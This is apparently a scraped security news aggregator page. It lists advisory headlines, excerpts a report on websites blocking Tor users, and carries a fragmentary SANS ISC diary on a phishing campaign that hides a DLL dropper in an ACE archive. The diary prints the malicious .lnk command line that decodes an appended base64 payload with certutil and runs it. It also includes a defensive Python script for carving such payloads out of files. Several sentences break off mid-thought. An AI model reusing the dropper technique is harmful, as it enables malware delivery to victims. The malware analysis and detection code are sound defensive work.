Hackin9
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
[SECURITY] [DSA 3490-1] websvn security update
 
Belkin N150 Router Multiple XSS Vulnerability
 


About 1.3 million IP addresses—including those used by Google, Yahoo, Craigslist, and Yelp—are turning users of the Tor anonymity network into second-class Web citizens by blocking them outright or degrading the services offered to them, according to a recently published research paper.

Titled "Do You See What I See? Differential Treatment of Anonymous Users," the paper said 3.67 percent of websites in the Alexa 1,000 discriminated against computers visiting with known Tor exit-node IP addresses. In some cases, the visitors are completely locked out, while in others users are required to complete burdensome CAPTCHAs or are limited in what they can do. The authors said the singling out was an attempt by the sites to limit fraud and other online crime, which is carried out by a disproportionately high percentage of Tor users. In the process, law-abiding Tor users are being treated as second-class Web citizens.

"While many websites block Tor to reduce abuse, doing so inadvertently impacts users from censored countries who do not have other ways to access censored Internet content," the authors wrote.


 
Import Woocommerce XSS Vulnerability
 
WP Ultimate Exporter XSS Vulnerability
 
WP Advanced Importer XSS Vulnerability
 
CSV Import XSS Vulnerability
 

I received some feedback today from Nick, a SANS ISC reader who detected an interesting phishing campaign based on an ACE file. I also detected the same kind of file earlier this morning. ACE is an old compression algorithm developed by a German company called e-merge. This file format was popular around the year 2000. Today it has almost disappeared and has been replaced by more popular formats, but ACE files can still be handled by popular tools like WinRAR or WinZIP. The fact that the format is quite old could help to bypass common low-level filters implemented by anti-spam solutions.

The phishing email was a classic one with an attached .RAR file named faktura.rar. But the

    # file faktura.rar

It

The ACE file contains a .lnk file. Link files are shortcut files used by Microsoft Windows to point to another executable file. The file VT score is also very low: 3/55 (1e56acf7b536d8f87234b4f7846fe0c0).

    %windir%\system32\cmd.exe /V:ON /c dir %TEMP%\faktura.lnk /s /b %TEMP%\bwTFO set /p k=%TEMP%\bwTFO findstr TVqQAA !k!%TEMP%\bwTFO certutil -decode %TEMP%\bwTFO %TEMP%\bwTFO.dll del %TEMP%\bwTFO !k!

A temporary file is created and filled with some malicious code and executed via rundll32. In this case, there is no macro to download data from a third-party website. The malicious code is simply appended to the link file and starts with the string TVqQAA.

    # strings faktura.lnk | grep TVqQAA | base64 -d - > malicious.bin
    # file malicious.bin
    malicious.bin: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

The PE file has a VT score of 1/55 (a911640a5dd4bca99c31eeac18e90901). I

Xavier
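As an added example (not part of the diary above), the following Python script does in code what the strings/grep/base64 pipeline does by hand: it carves a base64-encoded PE image out of an arbitrary file such as a .lnk, and then validates the MZ and PE headers so that a stray "TVqQAA" string in unrelated data is not reported as a payload. The shortcut it scans is a constructed sample built inline; the IMAGE_FILE_* constants are taken from the PE file format.

```python
import base64
import binascii
import re
import struct

# "TVqQAA" is the base64 encoding of the MZ header bytes b"MZ\x90\x00". In the
# campaign above the payload is appended as one base64 line, so a run that
# starts at this marker is aligned to a 4-character base64 quantum.
B64_PE_RUN = re.compile(rb"TVqQAA[A-Za-z0-9+/]*={0,2}")

IMAGE_FILE_MACHINE_I386 = 0x14C  # reported as "Intel 80386" by file(1)
IMAGE_FILE_DLL = 0x2000          # COFF Characteristics flag for a DLL


def parse_pe(data: bytes):
    """Return machine/DLL/size facts if data is a plausible MZ/PE image, else None."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine = struct.unpack_from("<H", data, e_lfanew + 4)[0]
    characteristics = struct.unpack_from("<H", data, e_lfanew + 22)[0]
    return {"machine": machine, "is_dll": bool(characteristics & IMAGE_FILE_DLL),
            "size": len(data)}


def carve_base64_pe(blob: bytes):
    """Find and decode base64-encoded PE images embedded anywhere in blob."""
    hits = []
    for m in B64_PE_RUN.finditer(blob):
        run = m.group(0)
        try:
            data = base64.b64decode(run, validate=True)
        except binascii.Error:
            # Run cut off before its padding: drop the incomplete trailing quantum.
            data = base64.b64decode(run[: len(run) - len(run) % 4])
        info = parse_pe(data)
        if info:
            info.update(offset=m.start(), payload=data)
            hits.append(info)
    return hits


def build_sample_lnk() -> bytes:
    """Constructed sample: a fake .lnk header followed by a tiny fake PE32 DLL in base64."""
    coff = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_I386, 0, 0, 0, 0, 0, IMAGE_FILE_DLL)
    pe = b"MZ\x90\x00" + b"\x00" * 0x38 + struct.pack("<I", 0x40) + b"PE\0\0" + coff
    lnk_stub = b"L\x00\x00\x00\x01\x14\x02\x00" + b"\x00" * 24 + b"\r\n"
    return lnk_stub + base64.b64encode(pe) + b"\r\n"
```

Running carve_base64_pe on a suspicious shortcut yields the decoded image, its offset in the carrier file and whether the COFF header marks it as a DLL, which is the same conclusion file(1) reached on malicious.bin above.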
 
GNU glibc 'getaddrinfo()' Function Multiple Stack Buffer Overflow Vulnerabilities
 
Oracle Java SE CVE-2015-4842 Remote Security Vulnerability
 
eFront 3.6.15.6 CMS - (Message Attachment) Persistent Cross Site Scripting Vulnerability
 
Re: Executable installers are vulnerable^WEVIL (case 26): the installer of GIMP for Windows allows arbitrary (remote) and escalation of privilege
 
[KIS-2016-02] Magento <= 1.9.2.2 (RSS Feed) Information Disclosure Vulnerability
 
Extra User Details [Privilege Escalation]
 
Executable installers are vulnerable^WEVIL (case 4): InstallShield's wrapper and setup.exe
 
Ubiquiti Networks UniFi v3.2.10 Generic CSRF Protection Bypass
 
[slackware-security] bind (SSA:2016-054-01)
 
[SECURITY] [DSA 3489-1] lighttpd security update
 